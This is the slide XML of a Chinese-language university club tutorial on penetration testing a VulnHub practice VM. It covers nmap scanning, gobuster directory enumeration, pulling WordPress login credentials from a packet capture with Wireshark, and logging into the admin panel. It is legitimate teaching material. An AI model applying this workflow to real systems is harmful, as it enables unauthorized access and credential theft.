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90" r:id="rId35"/>
    <p:sldId id="288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Montserrat" panose="02020500000000000000" charset="0"/>
      <p:regular r:id="rId42"/>
      <p:bold r:id="rId43"/>
      <p:italic r:id="rId44"/>
      <p:boldItalic r:id="rId45"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
      <p:regular r:id="rId46"/>
      <p:bold r:id="rId47"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-12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hzH9l3VKfLVtHnsRona5MOdgqM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4794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9825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/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="-1515884" y="-1719378"/>
            <a:ext cx="3679200" cy="367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5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5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-2175913">
            <a:off x="6501213" y="3908853"/>
            <a:ext cx="1705595" cy="1705595"/>
          </a:xfrm>
          <a:prstGeom prst="blockArc">
            <a:avLst>
              <a:gd name="adj1" fmla="val 13003178"/>
              <a:gd name="adj2" fmla="val 2121832"/>
              <a:gd name="adj3" fmla="val 2502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5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1355650" y="744575"/>
            <a:ext cx="6261600" cy="23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14;p35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1355650" y="3396875"/>
            <a:ext cx="4048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5;p35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1080000" y="2834125"/>
            <a:ext cx="68400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16;p35"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1441200" y="1455663"/>
            <a:ext cx="62616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9pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Google Shape;17;p35"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2649875" y="3207913"/>
            <a:ext cx="3823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9pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Google Shape;18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6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6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36"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1030775" y="3163475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36"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1030775" y="3480875"/>
            <a:ext cx="22530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subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3445500" y="3163475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subTitle" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3445500" y="3480875"/>
            <a:ext cx="22530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6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5860225" y="3163475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6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5860225" y="3480875"/>
            <a:ext cx="22530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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-879187" y="4312178"/>
            <a:ext cx="1705500" cy="1705500"/>
          </a:xfrm>
          <a:prstGeom prst="blockArc">
            <a:avLst>
              <a:gd name="adj1" fmla="val 16164733"/>
              <a:gd name="adj2" fmla="val 104114"/>
              <a:gd name="adj3" fmla="val 1277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_1_1_1_1_2">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="accent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-tqORvSEoxkLTpV-0p6tFhjxLsVtTuIj/view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kali.org/get-kali/#kali-virtual-machine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tfobins.github.io/gtfobins/tcpdump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2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ulnhub.com/entry/web-developer-1,288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2000"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>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2544800" y="3141170"/>
            <a:ext cx="4054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資安社 副社 王佑任</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>611235113@gms.ndhu.edu.tw</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="Google Shape;40;p1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1441200" y="1455663"/>
            <a:ext cx="62616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3200" dirty="0">
                <a:latin typeface="Microsoft JhengHei"/>
                <a:ea typeface="Microsoft JhengHei"/>
                <a:cs typeface="Microsoft JhengHei"/>
                <a:sym typeface="Microsoft JhengHei"/>
              </a:rPr>
              <a:t>滲透測試</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0">
                <a:latin typeface="Microsoft JhengHei"/>
                <a:ea typeface="Microsoft JhengHei"/>
                <a:cs typeface="Microsoft JhengHei"/>
                <a:sym typeface="Microsoft JhengHei"/>
              </a:rPr>
              <a:t>(2)</a:t>
            </a:r>
            <a:endParaRPr sz="32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" name="Google Shape;41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/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="820958" y="1635241"/>
            <a:ext cx="7511268" cy="3337225"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 6400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latin typeface="Microsoft JhengHei"/>
                <a:ea typeface="Microsoft JhengHei"/>
                <a:cs typeface="Microsoft JhengHei"/>
                <a:sym typeface="Microsoft JhengHei"/>
              </a:rPr>
              <a:t>啟動 </a:t>
            </a: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Web developer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Microsoft JhengHei"/>
                <a:ea typeface="Microsoft JhengHei"/>
                <a:cs typeface="Microsoft JhengHei"/>
                <a:sym typeface="Microsoft JhengHei"/>
              </a:rPr>
              <a:t>靶機</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="142" name="Google Shape;142;p10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="226931" y="1193886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最終畫面</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="143" name="Google Shape;14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331" y="1789151"/>
            <a:ext cx="6861337" cy="294231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latin typeface="Microsoft JhengHei"/>
                <a:ea typeface="Microsoft JhengHei"/>
                <a:cs typeface="Microsoft JhengHei"/>
                <a:sym typeface="Microsoft JhengHei"/>
              </a:rPr>
              <a:t>檢查 </a:t>
            </a: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kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Microsoft JhengHei"/>
                <a:ea typeface="Microsoft JhengHei"/>
                <a:cs typeface="Microsoft JhengHei"/>
                <a:sym typeface="Microsoft JhengHei"/>
              </a:rPr>
              <a:t>是否成功可以偵測到模擬機</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="150" name="Google Shape;150;p11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="226931" y="1193885"/>
            <a:ext cx="7181711" cy="106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kali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中，透過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nmap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掃描同網域內的主機</a:t>
            </a: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nmap -F 192.168.x.0/24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與自身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ipv4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的第三碼相同</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="151" name="Google Shape;15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183" y="2473849"/>
            <a:ext cx="3604361" cy="245606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1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="455090" y="4024695"/>
            <a:ext cx="2414925" cy="71550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 txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4306407" y="2473849"/>
            <a:ext cx="4789102" cy="106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猜測此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192.168.239.133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主機為虛擬機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目標開啟了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22,80 port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其中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80 port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為網頁服務，打開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Firefox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，輸入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192.168.239.133</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="154" name="Google Shape;154;p11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5057853" y="3949615"/>
            <a:ext cx="3950048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r>
              <a:rPr lang="en-US" sz="1000" b="1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注意，因網路為</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" i="0" u="none" strike="noStrike" cap="non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DHCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1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分發，每人的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" i="0" u="none" strike="noStrike" cap="non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kali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1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、靶機</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" i="0" u="none" strike="noStrike" cap="non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ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" i="0" u="none" strike="noStrike" cap="non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皆不同</a:t>
            </a:r>
            <a:endParaRPr sz="1000" b="1" i="0" u="none" strike="noStrike" cap="non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5" name="Google Shape;15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8833" y="3949615"/>
            <a:ext cx="210914" cy="21091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latin typeface="Microsoft JhengHei"/>
                <a:ea typeface="Microsoft JhengHei"/>
                <a:cs typeface="Microsoft JhengHei"/>
                <a:sym typeface="Microsoft JhengHei"/>
              </a:rPr>
              <a:t>瀏覽網頁服務</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="162" name="Google Shape;162;p12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="226931" y="1193886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打開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Firefox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，輸入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192.168.239.13</a:t>
            </a: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8528" y="1571266"/>
            <a:ext cx="6366943" cy="340146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latin typeface="Microsoft JhengHei"/>
                <a:ea typeface="Microsoft JhengHei"/>
                <a:cs typeface="Microsoft JhengHei"/>
                <a:sym typeface="Microsoft JhengHei"/>
              </a:rPr>
              <a:t>目錄枚舉 </a:t>
            </a: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(Directory enumeration)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13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1492568" y="1222133"/>
            <a:ext cx="2091186" cy="66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2400" b="1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gobuster</a:t>
            </a:r>
            <a:endParaRPr sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none" dirty="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2" name="Google Shape;17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5A380BA8-9F79-47B1-82BB-5B2C9ECCC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727" y="778159"/>
            <a:ext cx="1357841" cy="1357841"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Google Shape;170;p13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D4E5C49-4067-42B0-8E4D-46F15B9C7F50}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="226931" y="2373908"/>
            <a:ext cx="7181711" cy="72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sudo apt update</a:t>
            </a:r>
          </a:p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icrosoft JhengHei"/>
              <a:cs typeface="Microsoft JhengHei"/>
              <a:sym typeface="Microsoft JhengHei"/>
            </a:endParaRPr>
          </a:p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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" panose="02020500000000000000" charset="0"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t>sudo apt install gobuster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70;p13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B674DE7C-00BC-4F51-97F2-1409738C2578}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="226930" y="2027537"/>
            <a:ext cx="961123" cy="34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安裝指令</a:t>
            </a:r>
            <a:endParaRPr sz="1200" b="1" i="0" u="none" strike="noStrike" cap="none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0" name="Google Shape;170;p13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B8FA53B-3A66-49CA-81C4-4164ADDC86FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="226931" y="3349272"/>
            <a:ext cx="7181711" cy="72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gobuster [mode] -u [target URL] -w [wordlist] [optional flags]</a:t>
            </a:r>
          </a:p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icrosoft JhengHei"/>
              <a:cs typeface="Microsoft JhengHei"/>
              <a:sym typeface="Microsoft JhengHei"/>
            </a:endParaRPr>
          </a:p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Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t>Ex:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" panose="02020500000000000000" charset="0"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t> gobuster dir -u http://192.168.75.131 -w common.txt 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-t 5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170;p13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5DA53887-40B0-410C-BAB0-E61471FDFC1F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="226930" y="3002901"/>
            <a:ext cx="961123" cy="34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</a:pP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/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t>使用方法</a:t>
            </a:r>
            <a:endParaRPr sz="1200" b="1" i="0" u="none" strike="noStrike" cap="none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/>
              <a:sym typeface="Montserrat"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Google Shape;170;p13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{283DA9E4-C0AB-4B15-ABBD-E75300164940}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="639636" y="3988276"/>
            <a:ext cx="691022" cy="72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dir</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1200" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:latin typeface="Montserrat" panose="02020500000000000000" charset="0"/>
              <a:ea typeface="Microsoft JhengHei"/>
              <a:cs typeface="Microsoft JhengHei"/>
              <a:sym typeface="Microsoft JhengHei"/>
            </a:endParaRPr>
          </a:p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-u</a:t>
            </a:r>
          </a:p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-w</a:t>
            </a:r>
          </a:p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-t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70;p13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8BF7E8E-FFC5-429D-8054-9B08B621EED7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1119814" y="3988276"/>
            <a:ext cx="4399958" cy="72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 指定進行目錄爆破</a:t>
            </a:r>
          </a:p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 指定目標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URL</a:t>
            </a:r>
          </a:p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 指定字典檔案的路徑</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:latin typeface="Montserrat" panose="02020500000000000000" charset="0"/>
              <a:ea typeface="Microsoft JhengHei"/>
              <a:cs typeface="Microsoft JhengHei"/>
              <a:sym typeface="Microsoft JhengHei"/>
            </a:endParaRPr>
          </a:p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: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" alt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ontserrat"/>
                <a:sym typeface="Microsoft JhengHei"/>
              </a:rPr>
              <a:t>指定同時發送的請求數量，增加此數值可以提高掃描速度</a:t>
            </a:r>
            <a:endParaRPr sz="1200"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58372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latin typeface="Microsoft JhengHei"/>
                <a:ea typeface="Microsoft JhengHei"/>
                <a:cs typeface="Microsoft JhengHei"/>
                <a:sym typeface="Microsoft JhengHei"/>
              </a:rPr>
              <a:t>目錄枚舉 </a:t>
            </a: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(Directory enumeration)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13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="226931" y="1193886"/>
            <a:ext cx="7181711" cy="119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Gobuster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對網站的目錄結構作第一層掃描</a:t>
            </a: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gobuster dir -u 192.168.239.133 -w /usr/share/wordlists/dirb/common.txt -t 5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938" y="1938443"/>
            <a:ext cx="4367664" cy="300724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"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="574003" y="1580541"/>
            <a:ext cx="6661104" cy="3043551"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 6400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4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查看枚舉後的收穫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226931" y="1193886"/>
            <a:ext cx="4645419" cy="36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查看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http://192.168.239.133/ipdata/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602" y="1687703"/>
            <a:ext cx="6372581" cy="278250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4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1373824" y="4741537"/>
            <a:ext cx="2116915" cy="36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發現一個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analyze.cap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檔案</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="182" name="Google Shape;18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 flipH="1">
            <a:off x="1087919" y="4707652"/>
            <a:ext cx="285905" cy="28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4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4417375" y="4724844"/>
            <a:ext cx="4407970" cy="36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1200" b="1" i="0" u="none" strike="noStrike" cap="none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cap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" i="0" u="none" strike="noStrike" cap="none" dirty="0" err="1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檔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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" i="0" u="none" strike="noStrike" cap="none" dirty="0" err="1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網路監視封包捕捉資料檔，可以透過</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" i="0" u="none" strike="noStrike" cap="none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wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" i="0" u="none" strike="noStrike" cap="none" dirty="0" err="1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開啟</a:t>
            </a:r>
            <a:endParaRPr sz="9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4" name="Google Shape;1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6461" y="4782643"/>
            <a:ext cx="210914" cy="21091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/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="574002" y="1580541"/>
            <a:ext cx="5032537" cy="3043551"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 6400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5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查看枚舉後的收穫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2" name="Google Shape;192;p15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="226931" y="1193886"/>
            <a:ext cx="4645419" cy="36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查看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http://192.168.239.133/wp-admin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15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1373824" y="4741537"/>
            <a:ext cx="4645419" cy="36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 err="1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被導至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wordpress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200" b="1" i="0" u="none" strike="noStrike" cap="none" dirty="0" err="1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登錄後台</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="194" name="Google Shape;19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1087919" y="4707652"/>
            <a:ext cx="285905" cy="28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786" y="1672592"/>
            <a:ext cx="4575035" cy="275675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查看封包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2" name="Google Shape;202;p16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="226931" y="1193886"/>
            <a:ext cx="7054897" cy="5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回到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192.168.239.133/ipdata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，下載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analyze.cap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檔，並以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wireshark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開啟</a:t>
            </a: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3" name="Google Shape;20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140" y="1543545"/>
            <a:ext cx="6897063" cy="136226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6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="226931" y="3004756"/>
            <a:ext cx="7054897" cy="50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嘗試將目標鎖定在用戶的後台登入資訊，分析 </a:t>
            </a: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http</a:t>
            </a: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流量</a:t>
            </a:r>
            <a:endParaRPr sz="1200" b="1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5" name="Google Shape;20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140" y="3438959"/>
            <a:ext cx="7032712" cy="137666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查看封包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2" name="Google Shape;212;p17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="226931" y="1193886"/>
            <a:ext cx="7054897" cy="75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回到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wordpress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登入頁面</a:t>
            </a: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按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F12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，打開開發者工具，嘗試登入，我們發現登入的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http method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POST</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/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3" name="Google Shape;21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9243" y="1881886"/>
            <a:ext cx="6647755" cy="310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561503">
            <a:off x="1774658" y="4665213"/>
            <a:ext cx="269646" cy="269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3362" y="3814504"/>
            <a:ext cx="1945072" cy="6227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7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1125899" y="4024695"/>
            <a:ext cx="972535" cy="23360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7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2846796" y="4683233"/>
            <a:ext cx="697338" cy="16242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查看封包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4" name="Google Shape;224;p18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="226931" y="1193886"/>
            <a:ext cx="7054897" cy="75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Wireshark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中設置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filter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規則，過濾出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method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為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POST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的請求封包</a:t>
            </a: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http.request.method == "POST"</a:t>
            </a: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5" name="Google Shape;22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816" y="1881726"/>
            <a:ext cx="7822458" cy="180838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8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="226932" y="3855879"/>
            <a:ext cx="3136992" cy="121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發現其中一筆封包包含敏感資訊</a:t>
            </a:r>
            <a:endParaRPr sz="1200" b="1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 </a:t>
            </a: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user</a:t>
            </a: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輸入的帳號密碼記錄起來</a:t>
            </a:r>
            <a:endParaRPr sz="1200" b="1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7" name="Google Shape;22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3924" y="3890590"/>
            <a:ext cx="5098038" cy="117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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4096517" y="4433416"/>
            <a:ext cx="1703582" cy="22535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"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="702650" y="1655264"/>
            <a:ext cx="7667113" cy="3210412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"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="416649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下載</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> Vmware</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
            </a:br>
            <a:endParaRPr sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48" name="Google Shape;48;p2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="702650" y="1084326"/>
            <a:ext cx="844135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lvl="0" indent="-91440" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Calibri"/>
              <a:buChar char=" "/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://drive.google.com/file/d/1-tqORvSEoxkLTpV-0p6tFhjxLsVtTuIj/view?usp=sharing</a:t>
            </a:r>
            <a:endParaRPr sz="11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49;p2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1084326"/>
            <a:ext cx="927749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1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URL:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="50" name="Google Shape;50;p2" descr="https://hackmd-prod-images.s3-ap-northeast-1.amazonaws.com/uploads/upload_3716fa3bde652256b8eb58e6c8cb6c19.png?AWSAccessKeyId=AKIA3XSAAW6AWSKNINWO&amp;Expires=1710394202&amp;Signature=qeFMeo8FwD6GuK92hxs8jyz%2BhXo%3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653" y="1799403"/>
            <a:ext cx="7372693" cy="291062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登入後台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5" name="Google Shape;235;p19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="226931" y="1193886"/>
            <a:ext cx="4645419" cy="36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嘗試使用封包中發現的憑證登入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wordpress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後台</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="236" name="Google Shape;23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582" y="1619226"/>
